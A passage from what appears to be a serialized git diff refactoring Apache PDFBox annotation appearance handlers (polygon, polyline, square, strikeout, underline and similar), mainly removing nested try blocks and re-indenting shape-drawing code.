PDRectangle rect = annotation.getRectangle();", + "+ for (int i = 0; i < pathsArray.length / 2; ++i)", + " {", + "- // QuadPoints shall be ignored if any coordinate in the array lies outside", + "- // the region specified by Rect.", + "- PDRectangle rect = annotation.getRectangle();", + "- for (int i = 0; i < pathsArray.length / 2; ++i)", + "+ if (!rect.contains(pathsArray[i * 2], pathsArray[i * 2 + 1]))", + " {", + "- if (!rect.contains(pathsArray[i * 2], pathsArray[i * 2 + 1]))", + "- {", + "- LOG.warn(\"At least one /QuadPoints entry (\" + ", + "- pathsArray[i * 2] + \";\" + pathsArray[i * 2 + 1] + ", + "- \") is outside of rectangle, \" + rect + ", + "- \", /QuadPoints are ignored and /Rect is used instead\");", + "- pathsArray = null;", + "- break;", + "- }", + "+ LOG.warn(\"At least one /QuadPoints entry (\" + ", + "+ pathsArray[i * 2] + \";\" + pathsArray[i * 2 + 1] + ", + "+ \") is outside of rectangle, \" + rect + ", + "+ \", /QuadPoints are ignored and /Rect is used instead\");", + "+ pathsArray = null;", + "+ break;", + " }", + " }", + "+ }", + "- if (pathsArray == null)", + "+ if (pathsArray == null)", + "+ {", + "+ // Convert rectangle coordinates as if it was a /QuadPoints entry", + "+ pathsArray = new float[8];", + "+ pathsArray[0] = borderEdge.getLowerLeftX();", + "+ pathsArray[1] = borderEdge.getLowerLeftY();", + "+ pathsArray[2] = borderEdge.getUpperRightX();", + "+ pathsArray[3] = borderEdge.getLowerLeftY();", + "+ pathsArray[4] = borderEdge.getUpperRightX();", + "+ pathsArray[5] = borderEdge.getUpperRightY();", + "+ pathsArray[6] = borderEdge.getLowerLeftX();", + "+ pathsArray[7] = borderEdge.getUpperRightY();", + "+ }", + "+", + "+ int of = 0;", + "+ while (of + 7 < pathsArray.length)", + "+ {", + "+ if (annotation.getBorderStyle() != null &&", + "+ annotation.getBorderStyle().getStyle().equals(PDBorderStyleDictionary.STYLE_UNDERLINE))", + " {", + "- // Convert rectangle coordinates as if it was a /QuadPoints entry", + "- pathsArray = new float[8];", + "- pathsArray[0] = borderEdge.getLowerLeftX();", + "- pathsArray[1] = borderEdge.getLowerLeftY();", + "- pathsArray[2] = borderEdge.getUpperRightX();", + "- pathsArray[3] = borderEdge.getLowerLeftY();", + "- pathsArray[4] = borderEdge.getUpperRightX();", + "- pathsArray[5] = borderEdge.getUpperRightY();", + "- pathsArray[6] = borderEdge.getLowerLeftX();", + "- pathsArray[7] = borderEdge.getUpperRightY();", + "+ contentStream.moveTo(pathsArray[of], pathsArray[of + 1]);", + "+ contentStream.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", + " }", + "-", + "- int of = 0;", + "- while (of + 7 < pathsArray.length)", + "+ else", + " {", + "- if (annotation.getBorderStyle() != null &&", + "- annotation.getBorderStyle().getStyle().equals(PDBorderStyleDictionary.STYLE_UNDERLINE))", + "- {", + "- contentStream.moveTo(pathsArray[of], pathsArray[of + 1]);", + "- contentStream.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", + "- }", + "- else", + "- {", + "- contentStream.moveTo(pathsArray[of], pathsArray[of + 1]);", + "- contentStream.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", + "- contentStream.lineTo(pathsArray[of + 4], pathsArray[of + 5]);", + "- contentStream.lineTo(pathsArray[of + 6], pathsArray[of + 7]);", + "- contentStream.closePath();", + "- }", + "- of += 8;", + "+ contentStream.moveTo(pathsArray[of], pathsArray[of + 1]);", + "+ contentStream.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", + "+ contentStream.lineTo(pathsArray[of + 4], pathsArray[of + 5]);", + "+ contentStream.lineTo(pathsArray[of + 6], pathsArray[of + 7]);", + "+ contentStream.closePath();", + " }", + "-", + "- contentStream.drawShape(lineWidth, hasStroke, false);", + "+ of += 8;", + " }", + "+", + "+ contentStream.drawShape(lineWidth, hasStroke, false);", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "index 87fe22d72..29730a10b 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "@@ -93,65 +93,62 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", + "- try", + "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + " {", + "- try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + "+ boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", + "+", + "+ boolean hasBackground = contentStream", + "+ .setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "+", + "+ setOpacity(contentStream, annotation.getConstantOpacity());", + "+", + "+ contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", + "+ //TODO find better way to do this. Either pass border array to", + "+ // setBorderLine(), or use AnnotationBorder class", + "+ if (annotation.getBorderStyle() == null)", + " {", + "- boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", + "+ COSArray border = annotation.getBorder();", + "+ if (border.size() > 3 && border.getObject(3) instanceof COSArray)", + "+ {", + "+ contentStream.setLineDashPattern(((COSArray) border.getObject(3)).toFloatArray(), 0);", + "+ }", + "+ }", + "- boolean hasBackground = contentStream", + "- .setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + "+ {", + "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", + "+ borderEffect.getIntensity(), lineWidth, getRectangle());", + "+ cloudyBorder.createCloudyPolygon(pathArray);", + "+ annotation.setRectangle(cloudyBorder.getRectangle());", + "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "+ appearanceStream.setBBox(cloudyBorder.getBBox());", + "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", + "+ }", + "+ else", + "+ {", + "+ // the differences rectangle", + "+ setRectDifference(lineWidth);", + "- setOpacity(contentStream, annotation.getConstantOpacity());", + "+ // Acrobat applies a padding to each side of the bbox so the line is", + "+ // completely within the bbox.", + "- contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", + "- //TODO find better way to do this. Either pass border array to", + "- // setBorderLine(), or use AnnotationBorder class", + "- if (annotation.getBorderStyle() == null)", + "+ for (int i = 0; i < pathArray.length; i++)", + " {", + "- COSArray border = annotation.getBorder();", + "- if (border.size() > 3 && border.getObject(3) instanceof COSArray)", + "+ float[] pointsArray = pathArray[i];", + "+ // first array shall be of size 2 and specify the moveto operator", + "+ if (i == 0 && pointsArray.length == 2)", + " {", + "- contentStream.setLineDashPattern(((COSArray) border.getObject(3)).toFloatArray(), 0);", + "+ contentStream.moveTo(pointsArray[0], pointsArray[1]);", + " }", + "- }", + "- ", + "- PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "- if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + "- {", + "- CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", + "- borderEffect.getIntensity(), lineWidth, getRectangle());", + "- cloudyBorder.createCloudyPolygon(pathArray);", + "- annotation.setRectangle(cloudyBorder.getRectangle());", + "- PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "- appearanceStream.setBBox(cloudyBorder.getBBox());", + "- appearanceStream.setMatrix(cloudyBorder.getMatrix());", + "- }", + "- else", + "- {", + "- // the differences rectangle", + "- setRectDifference(lineWidth);", + "- ", + "- // Acrobat applies a padding to each side of the bbox so the line is", + "- // completely within the bbox.", + "- ", + "- for (int i = 0; i < pathArray.length; i++)", + "+ else", + " {", + "- float[] pointsArray = pathArray[i];", + "- // first array shall be of size 2 and specify the moveto operator", + "- if (i == 0 && pointsArray.length == 2)", + "+ // entries of length 2 shall be treated as lineto operator", + "+ if (pointsArray.length == 2)", + " {", + "- contentStream.moveTo(pointsArray[0], pointsArray[1]);", + "+ contentStream.lineTo(pointsArray[0], pointsArray[1]);", + " }", + "- else", + "+ else if (pointsArray.length == 6)", + " {", + "- // entries of length 2 shall be treated as lineto operator", + "- if (pointsArray.length == 2)", + "- {", + "- contentStream.lineTo(pointsArray[0], pointsArray[1]);", + "- }", + "- else if (pointsArray.length == 6)", + "- {", + "- contentStream.curveTo(pointsArray[0], pointsArray[1],", + "- pointsArray[2], pointsArray[3],", + "- pointsArray[4], pointsArray[5]);", + "- }", + "+ contentStream.curveTo(pointsArray[0], pointsArray[1],", + "+ pointsArray[2], pointsArray[3],", + "+ pointsArray[4], pointsArray[5]);", + " }", + "@@ -159,4 +156,4 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "- contentStream.drawShape(lineWidth, hasStroke, hasBackground);", + " }", + "+ contentStream.drawShape(lineWidth, hasStroke, hasBackground);", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "index d9ae0fbe8..cba698cd4 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", + "@@ -95,90 +95,87 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", + "- try", + "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + " {", + "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "- {", + "- boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "- setOpacity(cs, annotation.getConstantOpacity());", + "- boolean hasStroke = cs.setStrokingColorOnDemand(color);", + "+ boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "+ setOpacity(cs, annotation.getConstantOpacity());", + "+ boolean hasStroke = cs.setStrokingColorOnDemand(color);", + "- if (ab.dashArray != null)", + "- {", + "- cs.setLineDashPattern(ab.dashArray, 0);", + "- }", + "- cs.setLineWidth(ab.width);", + "+ if (ab.dashArray != null)", + "+ {", + "+ cs.setLineDashPattern(ab.dashArray, 0);", + "+ }", + "+ cs.setLineWidth(ab.width);", + "- for (int i = 0; i < pathsArray.length / 2; ++i)", + "+ for (int i = 0; i < pathsArray.length / 2; ++i)", + "+ {", + "+ float x = pathsArray[i * 2];", + "+ float y = pathsArray[i * 2 + 1];", + "+ if (i == 0)", + " {", + "- float x = pathsArray[i * 2];", + "- float y = pathsArray[i * 2 + 1];", + "- if (i == 0)", + "+ if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", + " {", + "- if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", + "+ // modify coordinate to shorten the segment", + "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "+ float x1 = pathsArray[2];", + "+ float y1 = pathsArray[3];", + "+ float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", + "+ if (Float.compare(len, 0) != 0)", + " {", + "- // modify coordinate to shorten the segment", + "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "- float x1 = pathsArray[2];", + "- float y1 = pathsArray[3];", + "- float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", + "- if (Float.compare(len, 0) != 0)", + "- {", + "- x += (x1 - x) / len * ab.width;", + "- y += (y1 - y) / len * ab.width;", + "- }", + "+ x += (x1 - x) / len * ab.width;", + "+ y += (y1 - y) / len * ab.width;", + " }", + "- cs.moveTo(x, y);", + " }", + "- else", + "+ cs.moveTo(x, y);", + "+ }", + "+ else", + "+ {", + "+ if (i == pathsArray.length / 2 - 1 &&", + "+ SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", + " {", + "- if (i == pathsArray.length / 2 - 1 &&", + "- SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", + "+ // modify coordinate to shorten the segment", + "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "+ float x0 = pathsArray[pathsArray.length - 4];", + "+ float y0 = pathsArray[pathsArray.length - 3];", + "+ float len = (float) (Math.sqrt(Math.pow(x0 - x, 2) + Math.pow(y0 - y, 2)));", + "+ if (Float.compare(len, 0) != 0)", + " {", + "- // modify coordinate to shorten the segment", + "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "- float x0 = pathsArray[pathsArray.length - 4];", + "- float y0 = pathsArray[pathsArray.length - 3];", + "- float len = (float) (Math.sqrt(Math.pow(x0 - x, 2) + Math.pow(y0 - y, 2)));", + "- if (Float.compare(len, 0) != 0)", + "- {", + "- x -= (x - x0) / len * ab.width;", + "- y -= (y - y0) / len * ab.width;", + "- }", + "+ x -= (x - x0) / len * ab.width;", + "+ y -= (y - y0) / len * ab.width;", + " }", + "- cs.lineTo(x, y);", + " }", + "+ cs.lineTo(x, y);", + " }", + "- cs.stroke();", + "+ }", + "+ cs.stroke();", + "- // do a transform so that first and last \"arms\" are imagined flat, like in line handler", + "- // the alternative would be to apply the transform to the LE shapes directly,", + "- // which would be more work and produce code difficult to understand", + "+ // do a transform so that first and last \"arms\" are imagined flat, like in line handler", + "+ // the alternative would be to apply the transform to the LE shapes directly,", + "+ // which would be more work and produce code difficult to understand", + "- // paint the styles here and after polyline draw, to avoid line crossing a filled shape", + "- if (!LE_NONE.equals(annotation.getStartPointEndingStyle()))", + "- {", + "- // check only needed to avoid q cm Q if LE_NONE", + "- float x2 = pathsArray[2];", + "- float y2 = pathsArray[3];", + "- float x1 = pathsArray[0];", + "- float y1 = pathsArray[1];", + "- cs.saveGraphicsState();", + "- double angle = Math.atan2(y2 - y1, x2 - x1);", + "- cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "- drawStyle(annotation.getStartPointEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", + "- cs.restoreGraphicsState();", + "- }", + "+ // paint the styles here and after polyline draw, to avoid line crossing a filled shape", + "+ if (!LE_NONE.equals(annotation.getStartPointEndingStyle()))", + "+ {", + "+ // check only needed to avoid q cm Q if LE_NONE", + "+ float x2 = pathsArray[2];", + "+ float y2 = pathsArray[3];", + "+ float x1 = pathsArray[0];", + "+ float y1 = pathsArray[1];", + "+ cs.saveGraphicsState();", + "+ double angle = Math.atan2(y2 - y1, x2 - x1);", + "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", + "+ cs.restoreGraphicsState();", + "+ }", + "- if (!LE_NONE.equals(annotation.getEndPointEndingStyle()))", + "- {", + "- // check only needed to avoid q cm Q if LE_NONE", + "- float x1 = pathsArray[pathsArray.length - 4];", + "- float y1 = pathsArray[pathsArray.length - 3];", + "- float x2 = pathsArray[pathsArray.length - 2];", + "- float y2 = pathsArray[pathsArray.length - 1];", + "- // save / restore not needed because it's the last one", + "- double angle = Math.atan2(y2 - y1, x2 - x1);", + "- cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "- float lineLength = (float) Math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)));", + "- drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, 0, ab.width, hasStroke, hasBackground);", + "- }", + "+ if (!LE_NONE.equals(annotation.getEndPointEndingStyle()))", + "+ {", + "+ // check only needed to avoid q cm Q if LE_NONE", + "+ float x1 = pathsArray[pathsArray.length - 4];", + "+ float y1 = pathsArray[pathsArray.length - 3];", + "+ float x2 = pathsArray[pathsArray.length - 2];", + "+ float y2 = pathsArray[pathsArray.length - 1];", + "+ // save / restore not needed because it's the last one", + "+ double angle = Math.atan2(y2 - y1, x2 - x1);", + "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "+ float lineLength = (float) Math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)));", + "+ drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, 0, ab.width, hasStroke, hasBackground);", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "index 1577dace5..75fd04e72 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "@@ -60,26 +60,52 @@ public class PDSquareAppearanceHandler extends PDAbstractAppearanceHandler", + " float lineWidth = getLineWidth();", + "- try", + "+ PDAnnotationSquare annotation = (PDAnnotationSquare) getAnnotation();", + "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + " {", + "- PDAnnotationSquare annotation = (PDAnnotationSquare) getAnnotation();", + "- try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + "+ boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", + "+ boolean hasBackground = contentStream", + "+ .setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "+", + "+ setOpacity(contentStream, annotation.getConstantOpacity());", + "+", + "+ contentStream.setBorderLine(lineWidth, annotation.getBorderStyle()); ", + "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "+", + "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + "+ {", + "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", + "+ borderEffect.getIntensity(), lineWidth, getRectangle());", + "+ cloudyBorder.createCloudyRectangle(annotation.getRectDifference());", + "+ annotation.setRectangle(cloudyBorder.getRectangle());", + "+ annotation.setRectDifference(cloudyBorder.getRectDifference());", + "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "+ appearanceStream.setBBox(cloudyBorder.getBBox());", + "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", + "+ }", + "+ else", + " {", + "- boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", + "- boolean hasBackground = contentStream", + "- .setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "- ", + "- setOpacity(contentStream, annotation.getConstantOpacity());", + "- ", + "- contentStream.setBorderLine(lineWidth, annotation.getBorderStyle()); ", + "- PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "- ", + "- if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + "+ // handle the border box", + "+ //", + "+ // There are two options. The handling is not part of the PDF specification but", + "+ // implementation specific to Adobe Reader", + "+ // - if /RD is set the border box is the /Rect entry inset by the respective", + "+ // border difference.", + "+ // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", + "+ // be set to be the line width and the /Rect is enlarged by the /RD amount", + "+", + "+ PDRectangle borderBox = null;", + "+ float[] rectDifferences = annotation.getRectDifferences();", + "+", + "+ if (rectDifferences.length == 0)", + " {", + "- CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", + "- borderEffect.getIntensity(), lineWidth, getRectangle());", + "- cloudyBorder.createCloudyRectangle(annotation.getRectDifference());", + "- annotation.setRectangle(cloudyBorder.getRectangle());", + "- annotation.setRectDifference(cloudyBorder.getRectDifference());", + "- PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "- appearanceStream.setBBox(cloudyBorder.getBBox());", + "- appearanceStream.setMatrix(cloudyBorder.getMatrix());", + "+ borderBox = getPaddedRectangle(getRectangle(), lineWidth/2);", + "+ // the differences rectangle", + "+ annotation.setRectDifferences(lineWidth/2);", + "+ annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", + "+", + "+ // when the normal appearance stream was generated BBox and Matrix have been set to the", + "+ // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", + "+ annotation.getNormalAppearanceStream().setBBox(getRectangle());", + "+ AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", + "+ -getRectangle().getLowerLeftY());", + "+ annotation.getNormalAppearanceStream().setMatrix(transform);", + " }", + "@@ -87,40 +113,11 @@ public class PDSquareAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- // handle the border box", + "- //", + "- // There are two options. The handling is not part of the PDF specification but", + "- // implementation specific to Adobe Reader", + "- // - if /RD is set the border box is the /Rect entry inset by the respective", + "- // border difference.", + "- // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", + "- // be set to be the line width and the /Rect is enlarged by the /RD amount", + "- ", + "- PDRectangle borderBox = null;", + "- float[] rectDifferences = annotation.getRectDifferences();", + "- ", + "- if (rectDifferences.length == 0)", + "- {", + "- borderBox = getPaddedRectangle(getRectangle(), lineWidth/2);", + "- // the differences rectangle", + "- annotation.setRectDifferences(lineWidth/2);", + "- annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", + "-", + "- // when the normal appearance stream was generated BBox and Matrix have been set to the", + "- // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", + "- annotation.getNormalAppearanceStream().setBBox(getRectangle());", + "- AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", + "- -getRectangle().getLowerLeftY());", + "- annotation.getNormalAppearanceStream().setMatrix(transform);", + "- }", + "- else", + "- {", + "- borderBox = applyRectDifferences(getRectangle(), rectDifferences);", + "- borderBox = getPaddedRectangle(borderBox, lineWidth/2);", + "- }", + "-", + "- contentStream.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", + "- borderBox.getWidth(), borderBox.getHeight());", + "+ borderBox = applyRectDifferences(getRectangle(), rectDifferences);", + "+ borderBox = getPaddedRectangle(borderBox, lineWidth/2);", + " }", + "- contentStream.drawShape(lineWidth, hasStroke, hasBackground);", + "+ contentStream.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", + "+ borderBox.getWidth(), borderBox.getHeight());", + " }", + "+", + "+ contentStream.drawShape(lineWidth, hasStroke, hasBackground);", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "index f8a5b325f..052f98b61 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDStrikeoutAppearanceHandler.java", + "@@ -91,49 +91,46 @@ public class PDStrikeoutAppearanceHandler extends PDAbstractAppearanceHandler", + "- try", + "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + " {", + "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "+ setOpacity(cs, annotation.getConstantOpacity());", + "+", + "+ cs.setStrokingColor(color);", + "+ if (ab.dashArray != null)", + " {", + "- setOpacity(cs, annotation.getConstantOpacity());", + "+ cs.setLineDashPattern(ab.dashArray, 0);", + "+ }", + "+ cs.setLineWidth(ab.width);", + "- cs.setStrokingColor(color);", + "- if (ab.dashArray != null)", + "+ // spec is incorrect", + "+ // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", + "+ for (int i = 0; i < pathsArray.length / 8; ++i)", + "+ {", + "+ // get mid point between bounds, substract the line width to approximate what Adobe is doing", + "+ // See e.g. CTAN-example-Annotations.pdf and PLPDF.com-MarkupAnnotations.pdf", + "+ // and https://bugs.ghostscript.com/show_bug.cgi?id=693664", + "+ // do the math for diagonal annotations with this weird old trick:", + "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "+ float len0 = (float) (Math.sqrt(Math.pow(pathsArray[i * 8] - pathsArray[i * 8 + 4], 2) + ", + "+ Math.pow(pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5], 2)));", + "+ float x0 = pathsArray[i * 8 + 4];", + "+ float y0 = pathsArray[i * 8 + 5];", + "+ if (Float.compare(len0, 0) != 0)", + " {", + "- cs.setLineDashPattern(ab.dashArray, 0);", + "+ // only if both coordinates are not identical to avoid divide by zero", + "+ x0 += (pathsArray[i * 8] - pathsArray[i * 8 + 4]) / len0 * (len0 / 2 - ab.width);", + "+ y0 += (pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5]) / len0 * (len0 / 2 - ab.width);", + " }", + "- cs.setLineWidth(ab.width);", + "-", + "- // spec is incorrect", + "- // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", + "- for (int i = 0; i < pathsArray.length / 8; ++i)", + "+ float len1 = (float) (Math.sqrt(Math.pow(pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6], 2) + ", + "+ Math.pow(pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7], 2)));", + "+ float x1 = pathsArray[i * 8 + 6];", + "+ float y1 = pathsArray[i * 8 + 7];", + "+ if (Float.compare(len1, 0) != 0)", + " {", + "- // get mid point between bounds, substract the line width to approximate what Adobe is doing", + "- // See e.g. CTAN-example-Annotations.pdf and PLPDF.com-MarkupAnnotations.pdf", + "- // and https://bugs.ghostscript.com/show_bug.cgi?id=693664", + "- // do the math for diagonal annotations with this weird old trick:", + "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", + "- float len0 = (float) (Math.sqrt(Math.pow(pathsArray[i * 8] - pathsArray[i * 8 + 4], 2) + ", + "- Math.pow(pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5], 2)));", + "- float x0 = pathsArray[i * 8 + 4];", + "- float y0 = pathsArray[i * 8 + 5];", + "- if (Float.compare(len0, 0) != 0)", + "- {", + "- // only if both coordinates are not identical to avoid divide by zero", + "- x0 += (pathsArray[i * 8] - pathsArray[i * 8 + 4]) / len0 * (len0 / 2 - ab.width);", + "- y0 += (pathsArray[i * 8 + 1] - pathsArray[i * 8 + 5]) / len0 * (len0 / 2 - ab.width);", + "- }", + "- float len1 = (float) (Math.sqrt(Math.pow(pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6], 2) + ", + "- Math.pow(pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7], 2)));", + "- float x1 = pathsArray[i * 8 + 6];", + "- float y1 = pathsArray[i * 8 + 7];", + "- if (Float.compare(len1, 0) != 0)", + "- {", + "- // only if both coordinates are not identical to avoid divide by zero", + "- x1 += (pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6]) / len1 * (len1 / 2 - ab.width);", + "- y1 += (pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7]) / len1 * (len1 / 2 - ab.width);", + "- }", + "- cs.moveTo(x0, y0);", + "- cs.lineTo(x1, y1);", + "+ // only if both coordinates are not identical to avoid divide by zero", + "+ x1 += (pathsArray[i * 8 + 2] - pathsArray[i * 8 + 6]) / len1 * (len1 / 2 - ab.width);", + "+ y1 += (pathsArray[i * 8 + 3] - pathsArray[i * 8 + 7]) / len1 * (len1 / 2 - ab.width);", + " }", + "- cs.stroke();", + "+ cs.moveTo(x0, y0);", + "+ cs.lineTo(x1, y1);", + " }", + "+ cs.stroke();", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", + "index 93535c514..48363df3b 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDUnderlineAppearanceHandler.java", + "@@ -92,25 +92,22 @@ public class PDUnderlineAppearanceHandler extends PDAbstractAppearanceHandler", + "- try", + "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + " {", + "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "- {", + "- setOpacity(cs, annotation.getConstantOpacity());", + "+ setOpacity(cs, annotation.getConstantOpacity());", + "- cs.setStrokingColor(color);", + "- if (ab.dashArray != null)", + "- {", + "- cs.setLineDashPattern(ab.dashArray, 0);", + "- }", + "- cs.setLineWidth(ab.width);", + "+ cs.setStrokingColor(color);", + "+ if (ab.dashArray != null)", + "+ {", + "+ cs.setLineDashPattern(ab.dashArray, 0);", + "+ }", + "+ cs.setLineWidth(ab.width);", + "- // spec is incorrect", + "- // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", + "- for (int i = 0; i < pathsArray.length / 8; ++i)", + "- {", + "- // only lower coords are used", + "- cs.moveTo(pathsArray[i * 8 + 4], pathsArray[i * 8 + 5]);", + "- cs.lineTo(pathsArray[i * 8 + 6], pathsArray[i * 8 + 7]);", + "- }", + "- cs.stroke();", + "+ // spec is incorrect", + "+ // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", + "+ for (int i = 0; i < pathsArray.length / 8; ++i)", + "+ {", + "+ // only lower coords are used", + "+ cs.moveTo(pathsArray[i * 